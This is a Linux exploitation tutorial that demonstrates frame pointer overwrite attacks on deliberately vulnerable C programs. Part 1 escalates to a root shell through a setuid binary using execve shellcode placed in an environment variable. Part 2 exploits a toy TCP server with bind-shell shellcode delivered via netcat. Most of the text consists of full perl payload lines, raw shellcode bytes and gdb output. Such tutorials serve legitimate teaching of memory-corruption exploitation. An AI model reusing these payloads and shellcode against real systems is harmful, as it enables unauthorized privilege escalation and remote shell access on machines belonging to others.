Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] Frame Pointer Overwrite Demonstration [LINUX] This paper assumes you have read the proper background information and/or technical details about the above subject. If not, please do so, because this read does not include key concepts but instead technical exploitation examples. That being said, enjoy. Knowledge is power. [PART 1 + LOCAL][PART 1 + LOCAL][PART 1 + LOCAL][PART 1 + LOCAL][PART 1 + LOCAL][PART 1 + LOCAL] bugs@linux:~$ cat fpo.c #include void die() { printf("Protection Enabled!\n"); exit(0); } void vuln(char *data) { char buf[1024], buf2[12]; int i = 0; memset(buf, 0, 1024); if(strlen(data) < sizeof(buf)+sizeof(buf2)+1) { while(*data) buf[i++] = *data++; } else { die(); } } int main(int argc, char *argv[]) { if(argc < 2) { printf("usage: %s data\n", argv[0]); return 0; } vuln(argv[1]); return 0; } bugs@linux:~$ gcc -o fpo fpo.c This program is vulnerable to a buffer overflow. But, there are conditions. With our environment in consideration, we need atleast 16 bytes over the buffer size to overwrite the EIP. But this program only allows us to fill the buffer with around 1036 bytes. If we go over 1036 bytes, it will tell us "Protection Enabled" and goto die(), which will end our program. Now that you know what we're working with, lets see what we can do. bugs@linux:~$ ./fpo usage: ./fpo data bugs@linux:~$ su Password: root@linux:/home/bugs# chown root:root fpo && chmod 4755 fpo root@linux:/home/bugs# exit exit bugs@linux:~$ ls -alh fpo -rwsr-xr-x 1 root root 8.4K 2008-11-27 03:12 fpo* bugs@linux:~$ gdb fpo GNU gdb 6.5 Copyright (C) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i486-linux-linux"...Using host libthread_db library "/lib/libthread_db.so.1". (gdb) break main Breakpoint 1 at 0x80484df (gdb) disas vuln Dump of assembler code for function vuln: 0x08048464 : push %ebp 0x08048465 : mov %esp,%ebp 0x08048467 : sub $0x428,%esp 0x0804846d : movl $0x0,0xfffffbe4(%ebp) 0x08048477 : sub $0x4,%esp 0x0804847a : push $0x400 0x0804847f : push $0x0 0x08048481 : lea 0xfffffbf8(%ebp),%eax 0x08048487 : push %eax 0x08048488 : call 0x8048358 0x0804848d : add $0x10,%esp 0x08048490 : sub $0xc,%esp 0x08048493 : pushl 0x8(%ebp) 0x08048496 : call 0x8048318 0x0804849b : add $0x10,%esp 0x0804849e : cmp $0x40c,%eax 0x080484a3 : ja 0x80484d2 0x080484a5 : mov 0x8(%ebp),%eax 0x080484a8 : cmpb $0x0,(%eax) 0x080484ab : je 0x80484d7 0x080484ad : mov 0xfffffbe4(%ebp),%eax 0x080484b3 : lea 0xfffffff8(%ebp),%edx 0x080484b6 : add %edx,%eax 0x080484b8 : lea 0xfffffc00(%eax),%edx 0x080484be : mov 0x8(%ebp),%eax 0x080484c1 : incl 0x8(%ebp) 0x080484c4 : mov (%eax),%al 0x080484c6 : mov %al,(%edx) 0x080484c8 : lea 0xfffffbe4(%ebp),%eax 0x080484ce : incl (%eax) 0x080484d0 : jmp 0x80484a5 0x080484d2 : call 0x8048444 0x080484d7 : leave 0x080484d8 : ret End of assembler dump. (gdb) break *vuln+115 Breakpoint 2 at 0x80484d7 (gdb) r `perl -e 'print "A" x 1040'` Starting program: /home/bugs/fpo `perl -e 'print "A" x 1040'` Breakpoint 1, 0x080484df in main () (gdb) c Continuing. Protection Enabled! Program exited normally. (gdb) r `perl -e 'print "A" x 1036'` Starting program: /home/bugs/fpo `perl -e 'print "A" x 1036'` Breakpoint 1, 0x080484df in main () (gdb) x/x $ebp 0xbffff0c8: 0xbffff0e8 *** 0xbffff0e8 --> _init saved ebp (gdb) x/x $ebp+4 0xbffff0cc: 0x4004728b *** 0x4004728b --> main()'s return address (gdb) c Continuing. Breakpoint 2, 0x080484d7 in vuln () (gdb) x/12x $esp 0xbfffec70: 0x00000000 0x00000000 0x400174dc 0x0000040c 0xbfffec80: 0x00000000 0x00000000 0x00000000 0x00000000 0xbfffec90: 0x41414141 0x41414141 0x41414141 0x41414141 *** 0xbfffec90 --> buffer's address (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x0804852c in main () (gdb) i r eax 0xbffff65b -1073744293 ecx 0x414141 4276545 edx 0xbffff09b -1073745765 ebx 0x4015bff0 1075167216 esp 0xbffff0b0 0xbffff0b0 ebp 0x41414141 0x41414141 esi 0xbffff120 -1073745632 edi 0x2 2 eip 0x804852c 0x804852c eflags 0x10282 [ SF IF RF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 We can overflow the buffer, but not enough to overwrite the EIP because of the 'protection' code. But sometimes control of the EBP leads to control over the EIP as well. So let's put our information together and see if we can smash this stack. filler -> _init saved ebp -> main()'s retaddr -> target eip -> buffer's address [A * 8]->[\xe8\xf0\xff\xbf]->[\x8b\x72\x04\x40]->[\x41\x41\x41\x41 * 254]->[\x90\xec\xff\xbf] 8 bytes 4 bytes 4 bytes 1016 bytes 4 bytes *Filler doesn't matter much, possibly helpful sometimes; increase target eip count if you don't want to use it* Total size of payload: 1036 bytes (gdb) r `perl -e 'print "A" x 8 . "\xe8\xf0\xff\xbf" . "\x8b\x72\x04\x40" . "\x41\x41\x41\x41" x 254 . "\x90\xec\xff\xbf"'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/bugs/fpo `perl -e 'print "A" x 8 . "\xe8\xf0\xff\xbf" . "\x8b\x72\x04\x40" . "\x41\x41\x41\x41" x 254 . "\x90\xec\xff\xbf"'` Breakpoint 1, 0x080484df in main () (gdb) c Continuing. Breakpoint 2, 0x080484d7 in vuln () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) i r eax 0x0 0 ecx 0xbfffec 12582892 edx 0xbffff09b -1073745765 ebx 0x4015bff0 1075167216 esp 0xbfffec98 0xbfffec98 ebp 0x41414141 0x41414141 esi 0xbffff120 -1073745632 edi 0x2 2 eip 0x41414141 0x41414141 eflags 0x10282 [ SF IF RF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 As you can see, we have now overwritten the both the EBP and the EIP. Let's get out of here and execute some code =) (gdb) q bugs@linux:~$ cat env.c #include int main(int argc, char *argv[]) { char *addr; if(argc < 2) { printf("usage: %s \n", argv[0]); return 0; } addr = getenv(argv[1]); if(addr == NULL) { printf("[%s] not found!\n", argv[1]); return 0; } printf("[%s] @ %p\n", argv[1], addr); return 0; } bugs@linux:~$ gcc -o env env.c bugs@linux:~$ ./env usage: ./env bugs@linux:~$ export NOPSC=`perl -e 'print "\x90" x 200 . "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'` bugs@linux:~$ ./env NOPSC [NOPSC] @ 0xbffff768 bugs@linux:~$ ./fpo `perl -e 'print "A" x 8 . "\xe8\xf0\xff\xbf" . "\x8b\x72\x04\x40" . "\x68\xf7\xff\xbf" x 254 . "\x90\xec\xff\xbf"'` sh-3.1# id uid=0(root) gid=100(users) groups=100(users) sh-3.1# exit exit bugs@linux:~$ [PART 2 + REMOTE][PART 2 + REMOTE][PART 2 + REMOTE][PART 2 + REMOTE][PART 2 + REMOTE][PART 2 + REMOTE] [Terminal #1] #include #include #include #include #define READSZ 2048 void die(int sock) { printf("Protection Enabled!\n"); close(sock); } void vuln(char *data, int sock) { char buf[1024], buf2[12]; int i = 0; memset(buf, 0, 1024); if(strlen(data) < sizeof(buf)+sizeof(buf2)+1) { while(*data) buf[i++] = *data++; } else if(strlen(data) < sizeof(buf)+sizeof(buf2)+1) { die(sock); } } int main(int argc, char *argv[]) { if(argc < 2) { printf("Usage: %s port\n", argv[0]); return 0; } int z, cli, serv, port = atoi(argv[1]); struct sockaddr_in client, server; server.sin_family = AF_INET; server.sin_port = htons(port); server.sin_addr.s_addr = INADDR_ANY; if((serv = socket(AF_INET, SOCK_STREAM, 0)) == -1) { printf("Error: socket()\n"); return -1; } if(bind(serv, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) { printf("Error: bind()\n"); return -1; } if(listen(serv, 10) == -1) { printf("Error: listen()\n"); return -1; } for(;;) { cli = accept(serv, (struct sockaddr *)&client, &z); if(readsock(cli) == -1) { printf("Error: readsock()\n"); close(cli); } } return 0; } int readsock(int sock) { char readbuf[READSZ]; memset(readbuf, 0, READSZ); read(sock, readbuf, READSZ, 0); vuln(readbuf, sock); close(sock); } bugs@linux:~$ gcc -o fposerv fposerv.c bugs@linux:~$ ./fposerv Usage: ./fposerv port bugs@linux:~$ gdb fposerv GNU gdb 6.5 Copyright (C) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i486-linux-linux"...Using host libthread_db library "/lib/libthread_db.so.1". (gdb) break main Breakpoint 1 at 0x8048673 (gdb) disas vuln Dump of assembler code for function vuln: 0x080485da : push %ebp 0x080485db : mov %esp,%ebp 0x080485dd : sub $0x428,%esp 0x080485e3 : movl $0x0,0xfffffbe4(%ebp) 0x080485ed : sub $0x4,%esp 0x080485f0 : push $0x400 0x080485f5 : push $0x0 0x080485f7 : lea 0xfffffbf8(%ebp),%eax 0x080485fd : push %eax 0x080485fe : call 0x80484a8 0x08048603 : add $0x10,%esp 0x08048606 : sub $0xc,%esp 0x08048609 : pushl 0x8(%ebp) 0x0804860c : call 0x8048448 0x08048611 : add $0x10,%esp 0x08048614 : cmp $0x40c,%eax 0x08048619 : ja 0x8048648 0x0804861b : mov 0x8(%ebp),%eax 0x0804861e : cmpb $0x0,(%eax) 0x08048621 : je 0x804866b 0x08048623 : mov 0xfffffbe4(%ebp),%eax 0x08048629 : lea 0xfffffff8(%ebp),%edx 0x0804862c : add %edx,%eax 0x0804862e : lea 0xfffffc00(%eax),%edx 0x08048634 : mov 0x8(%ebp),%eax 0x08048637 : incl 0x8(%ebp) 0x0804863a : mov (%eax),%al 0x0804863c : mov %al,(%edx) 0x0804863e : lea 0xfffffbe4(%ebp),%eax 0x08048644 : incl (%eax) 0x08048646 : jmp 0x804861b 0x08048648 : sub $0xc,%esp 0x0804864b : pushl 0x8(%ebp) 0x0804864e : call 0x8048448 0x08048653 : add $0x10,%esp 0x08048656 : cmp $0x40c,%eax 0x0804865b : ja 0x804866b 0x0804865d : sub $0xc,%esp 0x08048660 : pushl 0xc(%ebp) 0x08048663 : call 0x80485b4 0x08048668 : add $0x10,%esp 0x0804866b : leave 0x0804866c : ret End of assembler dump. (gdb) break *vuln+145 Breakpoint 2 at 0x804866b (gdb) r 5555 Starting program: /home/bugs/fposerv 5555 Breakpoint 1, 0x08048673 in main () (gdb) x/x $ebp 0xbffff4c8: 0xbffff4e8 (gdb) x/x $ebp+4 0xbffff4cc: 0x4004728b (gdb) c Continuing. [Terminal #2] bugs@linux:~$ perl -e 'print "\x44\x43\x42\x41" x 259' | nc localhost 5555 [Terminal #1] Breakpoint 2, 0x0804866b in vuln () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x08048825 in readsock () (gdb) i r eax 0xbffff05c -1073745828 ecx 0x0 0 edx 0xbfffec3b -1073746885 ebx 0x4015bff0 1075167216 esp 0xbfffec44 0xbfffec44 ebp 0x41424344 0x41424344 esi 0xbffff520 -1073744608 edi 0x2 2 eip 0x8048825 0x8048825 eflags 0x10296 [ PF AF SF IF RF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 (gdb) x/12x $esp 0xbfffec44: 0x00000007 0x00000800 0x00000000 0x41424344 0xbfffec54: 0x41424344 0x41424344 0x41424344 0x41424344 0xbfffec64: 0x41424344 0x41424344 0x41424344 0x41424344 (gdb) x/x 0xbfffec50 0xbfffec50: 0x41424344 (gdb) c Continuing. Program terminated with signal SIGSEGV, Segmentation fault. The program no longer exists. (gdb) r 5555 Starting program: /home/bugs/fposerv 5555 Breakpoint 1, 0x08048673 in main () (gdb) c Continuing. [Terminal #2] bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x44\x43\x42\x41" x 254 . "\x50\xec\xff\xbf"' | nc localhost 5555 [Terminal #1] Breakpoint 2, 0x0804866b in vuln () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) x/x 0xbfffec50 0xbfffec50: 0x41414141 (gdb) x/x 0xbfffec60 0xbfffec60: 0x41424344 (gdb) c Continuing. Program terminated with signal SIGSEGV, Segmentation fault. The program no longer exists. (gdb) r 5555 Starting program: /home/bugs/fposerv 5555 Breakpoint 1, 0x08048673 in main () (gdb) c Continuing. [Terminal #2] bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x44\x43\x42\x41" x 254 . "\x60\xec\xff\xbf"' | nc localhost 5555 [Terminal #1] Program received signal SIGSEGV, Segmentation fault. 0x41424344 in ?? () (gdb) c Continuing. Program terminated with signal SIGSEGV, Segmentation fault. The program no longer exists. (gdb) [Terminal #2] bugs@linux:~$ pcalc 254*4 (previous return address buffer) 1016 0x3f8 0y1111111000 bugs@linux:~$ pcalc 1016-800 (minus nops) 216 0xd8 0y11011000 bugs@linux:~$ pcalc 216-84 (minus shellcode) 132 0x84 0y10000100 bugs@linux:~$ pcalc 132/4 (new return address space) 33 0x21 0y100001 bugs@linux:~$ [Terminal #1] (gdb) r 5555 Starting program: /home/bugs/fposerv 5555 Breakpoint 1, 0x08048673 in main () (gdb) c Continuing. [Terminal #2] bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x44\x43\x42\x41" x 33 . "\x90" x 800 . "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\xce\xec\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x60\xec\xff\xbf"' | nc localhost 5555 [Terminal #1] Breakpoint 2, 0x0804866b in vuln () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x41424344 in ?? () (gdb) x/250x $esp 0xbfffec68: 0x41424344 0x41424344 0x41424344 0x41424344 0xbfffec78: 0x41424344 0x41424344 0x41424344 0x41424344 0xbfffec88: 0x41424344 0x41424344 0x41424344 0x41424344 0xbfffec98: 0x41424344 0x41424344 0x41424344 0x41424344 0xbfffeca8: 0x41424344 0x41424344 0x41424344 0x41424344 0xbfffecb8: 0x41424344 0x41424344 0x41424344 0x41424344 0xbfffecc8: 0x41424344 0x41424344 0x41424344 0x41424344 0xbfffecd8: 0x41424344 0x41424344 0x41424344 0x90909090 0xbfffece8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffecf8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffed08: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffed18: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffed28: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffed38: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffed48: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffed58: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffed68: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffed78: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffed88: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffed98: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffeda8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffedb8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffedc8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffedd8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffede8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffedf8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffee08: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffee18: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffee28: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffee38: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffee48: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffee58: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffee68: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffee78: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffee88: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffee98: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffeea8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffeeb8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffeec8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffeed8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffeee8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffeef8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffef08: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffef18: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffef28: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffef38: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffef48: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffef58: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffef68: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffef78: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffef88: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffef98: 0x90909090 0x90909090 0x90909090 0x90909090 ---Type to continue, or q to quit--- 0xbfffefa8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffefb8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffefc8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffefd8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffefe8: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfffeff8: 0x90909090 0x90909090 0x90909090 0x6a58666a 0xbffff008: 0x52995b01 0x89026a53 0x5280cde1 0x02ff6843 0xbffff018: 0xe189ecce 0x5051106a 0xc689e189 0x80cd66b0 0xbffff028: 0x66b04343 0x565280cd 0xb043e189 0x8980cd66 0xbffff038: 0xb0c389d9 0x80cd493f 0x52f8e241 0x732f6e68 0xbffff048: 0x2f2f6868 0xe3896962 (gdb) d Delete all breakpoints? (y or n) y (gdb) r 5555 Starting program: /home/bugs/fposerv 5555 [Terminal #2] Lets break down our final payload: filler -> _init saved ebp -> main()'s retaddr -> target eip -> nops -> shellcode -> buffer's address [A * 8]->[\xe8\xf0\xff\xbf]->[\x8b\x72\x04\x40]->[\x08\xee\xff\xbf * 33]->[\x90 * 800]->[\x6a.....\x80]->[\x90\xec\xff\xbf] 8 bytes 4 bytes 4 bytes 132 bytes 800 bytes 84 bytes 4 bytes Total size of payload: 1036 bytes bugs@linux:~$ perl -e 'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" . "\x08\xee\xff\xbf" x 33 . "\x90" x 800 . "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\xce\xec\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x60\xec\xff\xbf"' | nc localhost 5555 [CRTL+C] bugs@linux:~$ netstat -antp | grep 52972 (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) tcp 0 0 0.0.0.0:52972 0.0.0.0:* LISTEN 7089/fposerv bugs@linux:~$ nc localhost 52972 [Terminal #1] Program received signal SIGTRAP, Trace/breakpoint trap. 0x400007b0 in _start () from /lib/ld-linux.so.2 (gdb) c Continuing. [Terminal #2] id uid=1000(bugs) gid=100(users) groups=100(users) exit bugs@linux:~$ Questions. Comments. Concerns. --> 0xjbrown41@gmail.com